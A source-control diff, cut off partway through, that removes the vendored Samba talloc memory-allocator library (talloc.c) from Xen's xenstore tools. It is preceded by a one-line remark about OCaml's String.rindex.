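Note that String.rindex raises Not_found when the path contains no separator at all, so under these assumptions the helper is only safe on absolute paths.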
diff -r 10a8fae412c5 tools/xenstore/talloc.c
--- a/tools/xenstore/talloc.c   Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,1311 +0,0 @@
-/*
-   Samba Unix SMB/CIFS implementation.
-
-   Samba trivial allocation library - new interface
-
-   NOTE: Please read talloc_guide.txt for full documentation
-
-   Copyright (C) Andrew Tridgell 2004
-
-     ** NOTE! The following LGPL license applies to the talloc
-     ** library. This does NOT imply that all of Samba is released
-     ** under the LGPL
-
-   This library is free software; you can redistribute it and/or
-   modify it under the terms of the GNU Lesser General Public
-   License as published by the Free Software Foundation; either
-   version 2 of the License, or (at your option) any later version.
-
-   This library is distributed in the hope that it will be useful,
-   but WITHOUT ANY WARRANTY; without even the implied warranty of
-   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-   Lesser General Public License for more details.
-
-   You should have received a copy of the GNU Lesser General Public
-   License along with this library; if not, write to the Free Software
-   Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-/*
-  inspired by http://swapped.cc/halloc/
-*/
-
-#ifdef _SAMBA_BUILD_
-#include "includes.h"
-#if ((SAMBA_VERSION_MAJOR==3)&&(SAMBA_VERSION_MINOR<9))
-/* This is to circumvent SAMBA3's paranoid malloc checker. Here in this file
- * we trust ourselves... */
-#ifdef malloc
-#undef malloc
-#endif
-#ifdef realloc
-#undef realloc
-#endif
-#endif
-#else
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <stdarg.h>
-#include <stdint.h>
-#include "talloc.h"
-/* assume a modern system */
-#define HAVE_VA_COPY
-#endif
-
-/* use this to force every realloc to change the pointer, to stress test
-   code that might not cope */
-#define ALWAYS_REALLOC 0
-
-
-#define MAX_TALLOC_SIZE 0x10000000
-#define TALLOC_MAGIC 0xe814ec70
-#define TALLOC_FLAG_FREE 0x01
-#define TALLOC_FLAG_LOOP 0x02
-#define TALLOC_MAGIC_REFERENCE ((const char *)1)
-
-/* by default we abort when given a bad pointer (such as when talloc_free() is called 
-   on a pointer that came from malloc() */
-#ifndef TALLOC_ABORT
-#define TALLOC_ABORT(reason) abort()
-#endif
-
-#ifndef discard_const_p
-#if defined(__intptr_t_defined) || defined(HAVE_INTPTR_T)
-# define discard_const_p(type, ptr) ((type *)((intptr_t)(ptr)))
-#else
-# define discard_const_p(type, ptr) ((type *)(ptr))
-#endif
-#endif
-
-/* this null_context is only used if talloc_enable_leak_report() or
-   talloc_enable_leak_report_full() is called, otherwise it remains
-   NULL
-*/
-static const void *null_context;
-static void *cleanup_context;
-
-
-struct talloc_reference_handle {
-       struct talloc_reference_handle *next, *prev;
-       void *ptr;
-};
-
-typedef int (*talloc_destructor_t)(void *);
-
-struct talloc_chunk {
-       struct talloc_chunk *next, *prev;
-       struct talloc_chunk *parent, *child;
-       struct talloc_reference_handle *refs;
-       unsigned int null_refs; /* references from null_context */
-       talloc_destructor_t destructor;
-       const char *name;
-       size_t size;
-       unsigned flags;
-};
-
-/* 16 byte alignment seems to keep everyone happy */
-#define TC_HDR_SIZE ((sizeof(struct talloc_chunk)+15)&~15)
-#define TC_PTR_FROM_CHUNK(tc) ((void *)(TC_HDR_SIZE + (char*)tc))
-
-/* panic if we get a bad magic value */
-static struct talloc_chunk *talloc_chunk_from_ptr(const void *ptr)
-{
-       const char *pp = ptr;
-       struct talloc_chunk *tc = discard_const_p(struct talloc_chunk, pp - TC_HDR_SIZE);
-       if ((tc->flags & ~0xF) != TALLOC_MAGIC) { 
-               TALLOC_ABORT("Bad talloc magic value - unknown value"); 
-       }
-       if (tc->flags & TALLOC_FLAG_FREE) {
-               TALLOC_ABORT("Bad talloc magic value - double free"); 
-       }
-       return tc;
-}
-
-/* hook into the front of the list */
-#define _TLIST_ADD(list, p) \
-do { \
-        if (!(list)) { \
-               (list) = (p); \
-               (p)->next = (p)->prev = NULL; \
-       } else { \
-               (list)->prev = (p); \
-               (p)->next = (list); \
-               (p)->prev = NULL; \
-               (list) = (p); \
-       }\
-} while (0)
-
-/* remove an element from a list - element doesn't have to be in list. */
-#define _TLIST_REMOVE(list, p) \
-do { \
-       if ((p) == (list)) { \
-               (list) = (p)->next; \
-               if (list) (list)->prev = NULL; \
-       } else { \
-               if ((p)->prev) (p)->prev->next = (p)->next; \
-               if ((p)->next) (p)->next->prev = (p)->prev; \
-       } \
-       if ((p) && ((p) != (list))) (p)->next = (p)->prev = NULL; \
-} while (0)
-
-
-/*
-  return the parent chunk of a pointer
-*/
-static struct talloc_chunk *talloc_parent_chunk(const void *ptr)
-{
-       struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr);
-       while (tc->prev) tc=tc->prev;
-       return tc->parent;
-}
-
-void *talloc_parent(const void *ptr)
-{
-       struct talloc_chunk *tc = talloc_parent_chunk(ptr);
-       return tc? TC_PTR_FROM_CHUNK(tc) : NULL;
-}
-
-/* 
-   Allocate a bit of memory as a child of an existing pointer
-*/
-void *_talloc(const void *context, size_t size)
-{
-       struct talloc_chunk *tc;
-
-       if (context == NULL) {
-               context = null_context;
-       }
-
-       if (size >= MAX_TALLOC_SIZE) {
-               return NULL;
-       }
-
-       tc = malloc(TC_HDR_SIZE+size);
-       if (tc == NULL) return NULL;
-
-       tc->size = size;
-       tc->flags = TALLOC_MAGIC;
-       tc->destructor = NULL;
-       tc->child = NULL;
-       tc->name = NULL;
-       tc->refs = NULL;
-       tc->null_refs = 0;
-
-       if (context) {
-               struct talloc_chunk *parent = talloc_chunk_from_ptr(context);
-
-               tc->parent = parent;
-
-               if (parent->child) {
-                       parent->child->parent = NULL;
-               }
-
-               _TLIST_ADD(parent->child, tc);
-       } else {
-               tc->next = tc->prev = tc->parent = NULL;
-       }
-
-       return TC_PTR_FROM_CHUNK(tc);
-}
-
-
-/*
-  setup a destructor to be called on free of a pointer
-  the destructor should return 0 on success, or -1 on failure.
-  if the destructor fails then the free is failed, and the memory can
-  be continued to be used
-*/
-void talloc_set_destructor(const void *ptr, int (*destructor)(void *))
-{
-       struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr);
-       tc->destructor = destructor;
-}
-
-/*
-  increase the reference count on a piece of memory. 
-*/
-void talloc_increase_ref_count(const void *ptr)
-{
-       struct talloc_chunk *tc;
-       if (ptr == NULL) return;
-
-       tc = talloc_chunk_from_ptr(ptr);
-       tc->null_refs++;
-}
-
-/*
-  helper for talloc_reference()
-*/
-static int talloc_reference_destructor(void *ptr)
-{
-       struct talloc_reference_handle *handle = ptr;
-       struct talloc_chunk *tc1 = talloc_chunk_from_ptr(ptr);
-       struct talloc_chunk *tc2 = talloc_chunk_from_ptr(handle->ptr);
-       if (tc1->destructor != (talloc_destructor_t)-1) {
-               tc1->destructor = NULL;
-       }
-       _TLIST_REMOVE(tc2->refs, handle);
-       talloc_free(handle);
-       return 0;
-}
-
-/*
-  make a secondary reference to a pointer, hanging off the given context.
-  the pointer remains valid until both the original caller and this given
-  context are freed.
-  
-  the major use for this is when two different structures need to reference the 
-  same underlying data, and you want to be able to free the two instances separately,
-  and in either order
-*/
-void *talloc_reference(const void *context, const void *ptr)
-{
-       struct talloc_chunk *tc;
-       struct talloc_reference_handle *handle;
-       if (ptr == NULL) return NULL;
-
-       tc = talloc_chunk_from_ptr(ptr);
-       handle = talloc_named_const(context, sizeof(*handle), TALLOC_MAGIC_REFERENCE);
-
-       if (handle == NULL) return NULL;
-
-       /* note that we hang the destructor off the handle, not the
-          main context as that allows the caller to still setup their
-          own destructor on the context if they want to */
-       talloc_set_destructor(handle, talloc_reference_destructor);
-       handle->ptr = discard_const_p(void, ptr);
-       _TLIST_ADD(tc->refs, handle);
-       return handle->ptr;
-}
-
-/*
-  remove a secondary reference to a pointer. This undo's what
-  talloc_reference() has done. The context and pointer arguments
-  must match those given to a talloc_reference()
-*/
-static int talloc_unreference(const void *context, const void *ptr)
-{
-       struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr);
-       struct talloc_reference_handle *h;
-
-       if (context == NULL) {
-               context = null_context;
-       }
-
-       if ((context == null_context) && tc->null_refs) {
-               tc->null_refs--;
-               return 0;
-       }
-
-       for (h=tc->refs;h;h=h->next) {
-               struct talloc_chunk *p = talloc_parent_chunk(h);
-               if (p == NULL) {
-                       if (context == NULL) break;
-               } else if (TC_PTR_FROM_CHUNK(p) == context) {
-                       break;
-               }
-       }
-       if (h == NULL) {
-               return -1;
-       }
-
-       talloc_set_destructor(h, NULL);
-       _TLIST_REMOVE(tc->refs, h);
-       talloc_free(h);
-       return 0;
-}
-
-/*
-  remove a specific parent context from a pointer. This is a more
-  controlled varient of talloc_free()
-*/
-int talloc_unlink(const void *context, void *ptr)
-{
-       struct talloc_chunk *tc_p, *new_p;
-       void *new_parent;
-
-       if (ptr == NULL) {
-               return -1;
-       }
-
-       if (context == NULL) {
-               context = null_context;
-       }
-
-       if (talloc_unreference(context, ptr) == 0) {
-               return 0;
-       }
-
-       if (context == NULL) {
-               if (talloc_parent_chunk(ptr) != NULL) {
-                       return -1;
-               }
-       } else {
-               if (talloc_chunk_from_ptr(context) != talloc_parent_chunk(ptr)) {
-                       return -1;
-               }
-       }
-       
-       tc_p = talloc_chunk_from_ptr(ptr);
-
-       if (tc_p->refs == NULL) {
-               return talloc_free(ptr);
-       }
-
-       new_p = talloc_parent_chunk(tc_p->refs);
-       if (new_p) {
-               new_parent = TC_PTR_FROM_CHUNK(new_p);
-       } else {
-               new_parent = NULL;
-       }
-
-       if (talloc_unreference(new_parent, ptr) != 0) {
-               return -1;
-       }
-
-       talloc_steal(new_parent, ptr);
-
-       return 0;
-}
-
-/*
-  add a name to an existing pointer - va_list version
-*/
-static void talloc_set_name_v(const void *ptr, const char *fmt, va_list ap) PRINTF_ATTRIBUTE(2,0);
-
-static void talloc_set_name_v(const void *ptr, const char *fmt, va_list ap)
-{
-       struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr);
-       tc->name = talloc_vasprintf(ptr, fmt, ap);
-       if (tc->name) {
-               talloc_set_name_const(tc->name, ".name");
-       }
-}
-
-/*
-  add a name to an existing pointer
-*/
-void talloc_set_name(const void *ptr, const char *fmt, ...)
-{
-       va_list ap;
-       va_start(ap, fmt);
-       talloc_set_name_v(ptr, fmt, ap);
-       va_end(ap);
-}
-
-/*
-   more efficient way to add a name to a pointer - the name must point to a 
-   true string constant
-*/
-void talloc_set_name_const(const void *ptr, const char *name)
-{
-       struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr);
-       tc->name = name;
-}
-
-/*
-  create a named talloc pointer. Any talloc pointer can be named, and
-  talloc_named() operates just like talloc() except that it allows you
-  to name the pointer.
-*/
-void *talloc_named(const void *context, size_t size, const char *fmt, ...)
-{
-       va_list ap;
-       void *ptr;
-
-       ptr = _talloc(context, size);
-       if (ptr == NULL) return NULL;
-
-       va_start(ap, fmt);
-       talloc_set_name_v(ptr, fmt, ap);
-       va_end(ap);
-
-       return ptr;
-}
-
-/*
-  create a named talloc pointer. Any talloc pointer can be named, and
-  talloc_named() operates just like talloc() except that it allows you
-  to name the pointer.
-*/
-void *talloc_named_const(const void *context, size_t size, const char *name)
-{
-       void *ptr;
-
-       ptr = _talloc(context, size);
-       if (ptr == NULL) {
-               return NULL;
-       }
-
-       talloc_set_name_const(ptr, name);
-
-       return ptr;
-}
-
-/*
-  return the name of a talloc ptr, or "UNNAMED"
-*/
-const char *talloc_get_name(const void *ptr)
-{
-       struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr);
-       if (tc->name == TALLOC_MAGIC_REFERENCE) {
-               return ".reference";
-       }
-       if (tc->name) {
-               return tc->name;
-       }
-       return "UNNAMED";
-}
-
-
-/*
-  check if a pointer has the given name. If it does, return the pointer,
-  otherwise return NULL
-*/
-void *talloc_check_name(const void *ptr, const char *name)
-{
-       const char *pname;
-       if (ptr == NULL) return NULL;
-       pname = talloc_get_name(ptr);
-       if (pname == name || strcmp(pname, name) == 0) {
-               return discard_const_p(void, ptr);
-       }
-       return NULL;
-}
-
-
-/*
-  this is for compatibility with older versions of talloc
-*/
-void *talloc_init(const char *fmt, ...)
-{
-       va_list ap;
-       void *ptr;
-
-       talloc_enable_null_tracking();
-
-       ptr = _talloc(NULL, 0);
-       if (ptr == NULL) return NULL;
-
-       va_start(ap, fmt);
-       talloc_set_name_v(ptr, fmt, ap);
-       va_end(ap);
-
-       return ptr;
-}
-
-/*
-  this is a replacement for the Samba3 talloc_destroy_pool functionality. It
-  should probably not be used in new code. It's in here to keep the talloc
-  code consistent across Samba 3 and 4.
-*/
-static void talloc_free_children(void *ptr)
-{
-       struct talloc_chunk *tc;
-
-       if (ptr == NULL) {
-               return;
-       }
-
-       tc = talloc_chunk_from_ptr(ptr);
-
-       while (tc->child) {
-               /* we need to work out who will own an abandoned child
-                  if it cannot be freed. In priority order, the first
-                  choice is owner of any remaining reference to this
-                  pointer, the second choice is our parent, and the
-                  final choice is the null context. */
-               void *child = TC_PTR_FROM_CHUNK(tc->child);
-               const void *new_parent = null_context;
-               if (tc->child->refs) {
-                       struct talloc_chunk *p = talloc_parent_chunk(tc->child->refs);
-                       if (p) new_parent = TC_PTR_FROM_CHUNK(p);
-               }
-               if (talloc_free(child) == -1) {
-                       if (new_parent == null_context) {
-                               struct talloc_chunk *p = talloc_parent_chunk(ptr);
-                               if (p) new_parent = TC_PTR_FROM_CHUNK(p);
-                       }
-                       talloc_steal(new_parent, child);
-               }
-       }
-}
-
-/* 
-   free a talloc pointer. This also frees all child pointers of this 
-   pointer recursively
-
-   return 0 if the memory is actually freed, otherwise -1. The memory
-   will not be freed if the ref_count is > 1 or the destructor (if
-   any) returns non-zero
-*/
-int talloc_free(void *ptr)
-{
-       struct talloc_chunk *tc;
-
-       if (ptr == NULL) {
-               return -1;
-       }
-
-       tc = talloc_chunk_from_ptr(ptr);
-
-       if (tc->null_refs) {
-               tc->null_refs--;
-               return -1;
-       }
-
-       if (tc->refs) {
-               talloc_reference_destructor(tc->refs);
-               return -1;
-       }
-
-       if (tc->flags & TALLOC_FLAG_LOOP) {
-               /* we have a free loop - stop looping */
-               return 0;
-       }
-
-       if (tc->destructor) {
-               talloc_destructor_t d = tc->destructor;
-               if (d == (talloc_destructor_t)-1) {
-                       return -1;
-               }
-               tc->destructor = (talloc_destructor_t)-1;
-               if (d(ptr) == -1) {
-                       tc->destructor = d;
-                       return -1;
-               }
-               tc->destructor = NULL;
-       }
-
-       tc->flags |= TALLOC_FLAG_LOOP;
-
-       talloc_free_children(ptr);
-
-       if (tc->parent) {
-               _TLIST_REMOVE(tc->parent->child, tc);
-               if (tc->parent->child) {
-                       tc->parent->child->parent = tc->parent;
-               }
-       } else {
-               if (tc->prev) tc->prev->next = tc->next;
-               if (tc->next) tc->next->prev = tc->prev;
-       }
-
-       tc->flags |= TALLOC_FLAG_FREE;
-
-       free(tc);
-       return 0;
-}
-
-
-
-/*
-  A talloc version of realloc. The context argument is only used if
-  ptr is NULL
-*/
-void *_talloc_realloc(const void *context, void *ptr, size_t size, const char *name)
-{
-       struct talloc_chunk *tc;
-       void *new_ptr;
-
-       /* size zero is equivalent to free() */
-       if (size == 0) {
-               talloc_free(ptr);
-               return NULL;
-       }
-
-       if (size >= MAX_TALLOC_SIZE) {
-               return NULL;
-       }
-
-       /* realloc(NULL) is equavalent to malloc() */
-       if (ptr == NULL) {
-               return talloc_named_const(context, size, name);
-       }
-
-       tc = talloc_chunk_from_ptr(ptr);
-
-       /* don't allow realloc on referenced pointers */
-       if (tc->refs) {
-               return NULL;
-       }
-
-       /* by resetting magic we catch users of the old memory */
-       tc->flags |= TALLOC_FLAG_FREE;
-
-#if ALWAYS_REALLOC
-       new_ptr = malloc(size + TC_HDR_SIZE);
-       if (new_ptr) {
-               memcpy(new_ptr, tc, tc->size + TC_HDR_SIZE);
-               free(tc);
-       }
-#else
-       new_ptr = realloc(tc, size + TC_HDR_SIZE);
-#endif
-       if (!new_ptr) { 
-               tc->flags &= ~TALLOC_FLAG_FREE; 
-               return NULL; 
-       }
-
-       tc = new_ptr;
-       tc->flags &= ~TALLOC_FLAG_FREE; 
-       if (tc->parent) {
-               tc->parent->child = new_ptr;
-       }
-       if (tc->child) {
-               tc->child->parent = new_ptr;
-       }
-
-       if (tc->prev) {
-               tc->prev->next = tc;
-       }
-       if (tc->next) {
-               tc->next->prev = tc;
-       }
-
-       tc->size = size;
-       talloc_set_name_const(TC_PTR_FROM_CHUNK(tc), name);
-
-       return TC_PTR_FROM_CHUNK(tc);
-}
-
-/* 
-   move a lump of memory from one talloc context to another return the
-   ptr on success, or NULL if it could not be transferred.
-   passing NULL as ptr will always return NULL with no side effects.
-*/
-void *talloc_steal(const void *new_ctx, const void *ptr)
-{
-       struct talloc_chunk *tc, *new_tc;
-
-       if (!ptr) {
-               return NULL;
-       }
-
-       if (new_ctx == NULL) {
-               new_ctx = null_context;
-       }
-
-       tc = talloc_chunk_from_ptr(ptr);
-
-       if (new_ctx == NULL) {
-               if (tc->parent) {
-                       _TLIST_REMOVE(tc->parent->child, tc);
-                       if (tc->parent->child) {
-                               tc->parent->child->parent = tc->parent;
-                       }
-               } else {
-                       if (tc->prev) tc->prev->next = tc->next;
-                       if (tc->next) tc->next->prev = tc->prev;
-               }
-               
-               tc->parent = tc->next = tc->prev = NULL;
-               return discard_const_p(void, ptr);
-       }
-
-       new_tc = talloc_chunk_from_ptr(new_ctx);
-
-       if (tc == new_tc) {
-               return discard_const_p(void, ptr);
-       }
-
-       if (tc->parent) {
-               _TLIST_REMOVE(tc->parent->child, tc);
-               if (tc->parent->child) {
-                       tc->parent->child->parent = tc->parent;
-               }
-       } else {
-               if (tc->prev) tc->prev->next = tc->next;
-               if (tc->next) tc->next->prev = tc->prev;
-       }
-
-       tc->parent = new_tc;
-       if (new_tc->child) new_tc->child->parent = NULL;
-       _TLIST_ADD(new_tc->child, tc);
-
-       return discard_const_p(void, ptr);
-}
-
-/*
-  return the total size of a talloc pool (subtree)
-*/
-off_t talloc_total_size(const void *ptr)
-{
-       off_t total = 0;
-       struct talloc_chunk *c, *tc;
-       
-       if (ptr == NULL) {
-               ptr = null_context;
-       }
-       if (ptr == NULL) {
-               return 0;
-       }
-
-       tc = talloc_chunk_from_ptr(ptr);
-
-       if (tc->flags & TALLOC_FLAG_LOOP) {
-               return 0;
-       }
-
-       tc->flags |= TALLOC_FLAG_LOOP;
-
-       total = tc->size;
-       for (c=tc->child;c;c=c->next) {
-               total += talloc_total_size(TC_PTR_FROM_CHUNK(c));
-       }
-
-       tc->flags &= ~TALLOC_FLAG_LOOP;
-
-       return total;
-}
-
-/*
-  return the total number of blocks in a talloc pool (subtree)
-*/
-off_t talloc_total_blocks(const void *ptr)
-{
-       off_t total = 0;
-       struct talloc_chunk *c, *tc = talloc_chunk_from_ptr(ptr);
-
-       if (tc->flags & TALLOC_FLAG_LOOP) {
-               return 0;
-       }
-
-       tc->flags |= TALLOC_FLAG_LOOP;
-
-       total++;
-       for (c=tc->child;c;c=c->next) {
-               total += talloc_total_blocks(TC_PTR_FROM_CHUNK(c));
-       }
-
-       tc->flags &= ~TALLOC_FLAG_LOOP;
-
-       return total;
-}
-
-/*
-  return the number of external references to a pointer
-*/
-static int talloc_reference_count(const void *ptr)
-{
-       struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr);
-       struct talloc_reference_handle *h;
-       int ret = 0;
-
-       for (h=tc->refs;h;h=h->next) {
-               ret++;
-       }
-       return ret;
-}
-
-/*
-  report on memory usage by all children of a pointer, giving a full tree view
-*/
-void talloc_report_depth(const void *ptr, FILE *f, int depth)
-{
-       struct talloc_chunk *c, *tc = talloc_chunk_from_ptr(ptr);
-
-       if (tc->flags & TALLOC_FLAG_LOOP) {
-               return;
-       }
-
-       tc->flags |= TALLOC_FLAG_LOOP;
-
-       for (c=tc->child;c;c=c->next) {
-               if (c->name == TALLOC_MAGIC_REFERENCE) {
-                       struct talloc_reference_handle *handle = TC_PTR_FROM_CHUNK(c);
-                       const char *name2 = talloc_get_name(handle->ptr);
-                       fprintf(f, "%*sreference to: %s\n", depth*4, "", name2);
-               } else {
-                       const char *name = talloc_get_name(TC_PTR_FROM_CHUNK(c));
-                       fprintf(f, "%*s%-30s contains %6lu bytes in %3lu blocks (ref %d)\n", 
-                               depth*4, "",
-                               name,
-                               (unsigned long)talloc_total_size(TC_PTR_FROM_CHUNK(c)),
-                               (unsigned long)talloc_total_blocks(TC_PTR_FROM_CHUNK(c)),
-                               talloc_reference_count(TC_PTR_FROM_CHUNK(c)));
-                       talloc_report_depth(TC_PTR_FROM_CHUNK(c), f, depth+1);
-               }
-       }
-       tc->flags &= ~TALLOC_FLAG_LOOP;
-}
-
-/*
-  report on memory usage by all children of a pointer, giving a full tree view
-*/
-void talloc_report_full(const void *ptr, FILE *f)
-{
-       if (ptr == NULL) {
-               ptr = null_context;
-       }
-       if (ptr == NULL) return;
-
-       fprintf(f,"full talloc report on '%s' (total %lu bytes in %lu blocks)\n", 
-               talloc_get_name(ptr), 
-               (unsigned long)talloc_total_size(ptr),
-               (unsigned long)talloc_total_blocks(ptr));
-
-       talloc_report_depth(ptr, f, 1);
-       fflush(f);
-}
-
-/*
-  report on memory usage by all children of a pointer
-*/
-void talloc_report(const void *ptr, FILE *f)
-{
-       struct talloc_chunk *c, *tc;
-
-       if (ptr == NULL) {
-               ptr = null_context;
-       }
-       if (ptr == NULL) return;
-       
-       fprintf(f,"talloc report on '%s' (total %lu bytes in %lu blocks)\n", 
-               talloc_get_name(ptr), 
-               (unsigned long)talloc_total_size(ptr),
-               (unsigned long)talloc_total_blocks(ptr));
-
-       tc = talloc_chunk_from_ptr(ptr);
-
-       for (c=tc->child;c;c=c->next) {
-               fprintf(f, "\t%-30s contains %6lu bytes in %3lu blocks\n", 
-                       talloc_get_name(TC_PTR_FROM_CHUNK(c)),
-                       (unsigned long)talloc_total_size(TC_PTR_FROM_CHUNK(c)),
-                       (unsigned long)talloc_total_blocks(TC_PTR_FROM_CHUNK(c)));
-       }
-       fflush(f);
-}
-
-/*
-  report on any memory hanging off the null context
-*/
-static void talloc_report_null(void)
-{
-       if (talloc_total_size(null_context) != 0) {
-               talloc_report(null_context, stderr);
-       }
-}
-
-/*
-  report on any memory hanging off the null context
-*/
-static void talloc_report_null_full(void)
-{
-       if (talloc_total_size(null_context) != 0) {
-               talloc_report_full(null_context, stderr);
-       }
-}
-
-/*
-  enable tracking of the NULL context
-*/
-void talloc_enable_null_tracking(void)
-{
-       if (null_context == NULL) {
-               null_context = talloc_named_const(NULL, 0, "null_context");
-       }
-}
-
-#ifdef _SAMBA_BUILD_
-/* Ugly calls to Samba-specific sprintf_append... JRA. */
-
-/*
-  report on memory usage by all children of a pointer, giving a full tree view
-*/
-static void talloc_report_depth_str(const void *ptr, char **pps, ssize_t *plen, size_t *pbuflen, int depth)
-{
-       struct talloc_chunk *c, *tc = talloc_chunk_from_ptr(ptr);
-
-       if (tc->flags & TALLOC_FLAG_LOOP) {
-               return;
-       }
-
-       tc->flags |= TALLOC_FLAG_LOOP;
-
-       for (c=tc->child;c;c=c->next) {
-               if (c->name == TALLOC_MAGIC_REFERENCE) {
-                       struct talloc_reference_handle *handle = TC_PTR_FROM_CHUNK(c);
-                       const char *name2 = talloc_get_name(handle->ptr);
-
-                       sprintf_append(NULL, pps, plen, pbuflen,
-                               "%*sreference to: %s\n", depth*4, "", name2);
-
-               } else {
-                       const char *name = talloc_get_name(TC_PTR_FROM_CHUNK(c));
-
-                       sprintf_append(NULL, pps, plen, pbuflen,
-                               "%*s%-30s contains %6lu bytes in %3lu blocks (ref %d)\n", 
-                               depth*4, "",
-                               name,
-                               (unsigned long)talloc_total_size(TC_PTR_FROM_CHUNK(c)),
-                               (unsigned long)talloc_total_blocks(TC_PTR_FROM_CHUNK(c)),
-                               talloc_reference_count(TC_PTR_FROM_CHUNK(c)));
-
-                       talloc_report_depth_str(TC_PTR_FROM_CHUNK(c), pps, plen, pbuflen, depth+1);
-               }
-       }
-       tc->flags &= ~TALLOC_FLAG_LOOP;
-}
-
-/*
-  report on memory usage by all children of a pointer
-*/
-char *talloc_describe_all(void)
-{
-       ssize_t len = 0;
-       size_t buflen = 512;
-       char *s = NULL;
-
-       if (null_context == NULL) {
-               return NULL;
-       }
-
-       sprintf_append(NULL, &s, &len, &buflen,
-               "full talloc report on '%s' (total %lu bytes in %lu blocks)\n", 
-               talloc_get_name(null_context), 
-               (unsigned long)talloc_total_size(null_context),
-               (unsigned long)talloc_total_blocks(null_context));
-
-       if (!s) {
-               return NULL;
-       }
-       talloc_report_depth_str(null_context, &s, &len, &buflen, 1);
-       return s;
-}
-#endif
-
-/*
-  enable leak reporting on exit
-*/
-void talloc_enable_leak_report(void)
-{
-       talloc_enable_null_tracking();
-       atexit(talloc_report_null);
-}
-
-/*
-  enable full leak reporting on exit
-*/
-void talloc_enable_leak_report_full(void)
-{
-       talloc_enable_null_tracking();
-       atexit(talloc_report_null_full);
-}
-
-/* 
-   talloc and zero memory. 
-*/
-void *_talloc_zero(const void *ctx, size_t size, const char *name)
-{
-       void *p = talloc_named_const(ctx, size, name);
-
-       if (p) {
-               memset(p, '\0', size);
-       }
-
-       return p;
-}
-
-
-/*
-  memdup with a talloc. 
-*/
-void *_talloc_memdup(const void *t, const void *p, size_t size, const char *name)
-{
-       void *newp = talloc_named_const(t, size, name);
-
-       if (newp) {
-               memcpy(newp, p, size);
-       }
-
-       return newp;
-}
-
-/*
-  strdup with a talloc 
-*/
-char *talloc_strdup(const void *t, const char *p)
-{
-       char *ret;
-       if (!p) {
-               return NULL;
-       }
-       ret = talloc_memdup(t, p, strlen(p) + 1);
-       if (ret) {
-               talloc_set_name_const(ret, ret);
-       }
-       return ret;
-}
-
-/*
- append to a talloced string 
-*/
-char *talloc_append_string(const void *t, char *orig, const char *append)
-{
-       char *ret;
-       size_t olen = strlen(orig);
-       size_t alenz;
-
-       if (!append)
-               return orig;
-
-       alenz = strlen(append) + 1;
-
-       ret = talloc_realloc(t, orig, char, olen + alenz);
-       if (!ret)
-               return NULL;
-
-       /* append the string with the trailing \0 */
-       memcpy(&ret[olen], append, alenz);
-
-       return ret;
-}
-
-/*
-  strndup with a talloc 
-*/
-char *talloc_strndup(const void *t, const char *p, size_t n)
-{
-       size_t len;
-       char *ret;
-
-       for (len=0; len<n && p[len]; len++) ;
-
-       ret = _talloc(t, len + 1);
-       if (!ret) { return NULL; }
-       memcpy(ret, p, len);
-       ret[len] = 0;
-       talloc_set_name_const(ret, ret);
-       return ret;
-}
-
-#ifndef VA_COPY
-#ifdef HAVE_VA_COPY
-#define VA_COPY(dest, src) va_copy(dest, src)
-#elif defined(HAVE___VA_COPY)
-#define VA_COPY(dest, src) __va_copy(dest, src)
-#else
-#define VA_COPY(dest, src) (dest) = (src)
-#endif
-#endif
-
-char *talloc_vasprintf(const void *t, const char *fmt, va_list ap)
-{      
-       int len;
-       char *ret;
-       va_list ap2;
-       char c;
-       
-       VA_COPY(ap2, ap);
-
-       /* this call looks strange, but it makes it work on older solaris boxes */
-       if ((len = vsnprintf(&c, 1, fmt, ap2)) < 0) {
-               return NULL;
-       }
-
-       ret = _talloc(t, len+1);
-       if (ret) {
-               VA_COPY(ap2, ap);
-               vsnprintf(ret, len+1, fmt, ap2);
-               talloc_set_name_const(ret, ret);
-       }
-
-       return ret;
-}
-
-
-/*
-  Perform string formatting, and return a pointer to newly allocated
-  memory holding the result, inside a memory pool.
- */
-char *talloc_asprintf(const void *t, const char *fmt, ...)
-{
-       va_list ap;
-       char *ret;
-
-       va_start(ap, fmt);
-       ret = talloc_vasprintf(t, fmt, ap);
-       va_end(ap);
-       return ret;
-}
-
-
-/**
- * Realloc @p s to append the formatted result of @p fmt and @p ap,
- * and return @p s, which may have moved.  Good for gradually
- * accumulating output into a string buffer.
- **/
-
-static char *talloc_vasprintf_append(char *s, const char *fmt, va_list ap) PRINTF_ATTRIBUTE(2,0);
-
-static char *talloc_vasprintf_append(char *s, const char *fmt, va_list ap)
-{      
-       struct talloc_chunk *tc;
-       int len, s_len;
-       va_list ap2;
-
-       if (s == NULL) {
-               return talloc_vasprintf(NULL, fmt, ap);
-       }
-
-       tc = talloc_chunk_from_ptr(s);
-
-       VA_COPY(ap2, ap);
-
-       s_len = tc->size - 1;
-       if ((len = vsnprintf(NULL, 0, fmt, ap2)) <= 0) {
-               /* Either the vsnprintf failed or the format resulted in
-                * no characters being formatted. In the former case, we
-                * ought to return NULL, in the latter we ought to return
-                * the original string. Most current callers of this 
-                * function expect it to never return NULL.
-                */
-               return s;
-       }
-
-       s = talloc_realloc(NULL, s, char, s_len + len+1);
-       if (!s) return NULL;
-
-       VA_COPY(ap2, ap);
-
-       vsnprintf(s+s_len, len+1, fmt, ap2);
-       talloc_set_name_const(s, s);
-
-       return s;
-}
-
-/*
-  Realloc @p s to append the formatted result of @p fmt and return @p
-  s, which may have moved.  Good for gradually accumulating output
-  into a string buffer.
- */
-char *talloc_asprintf_append(char *s, const char *fmt, ...)
-{
-       va_list ap;
-
-       va_start(ap, fmt);
-       s = talloc_vasprintf_append(s, fmt, ap);
-       va_end(ap);
-       return s;
-}
-
-/*
-  alloc an array, checking for integer overflow in the array size
-*/
-void *_talloc_array(const void *ctx, size_t el_size, unsigned count, const char *name)
-{
-       if (count >= MAX_TALLOC_SIZE/el_size) {
-               return NULL;
-       }
-       return talloc_named_const(ctx, el_size * count, name);
-}
-
-/*
-  alloc an zero array, checking for integer overflow in the array size
-*/
-void *_talloc_zero_array(const void *ctx, size_t el_size, unsigned count, const char *name)
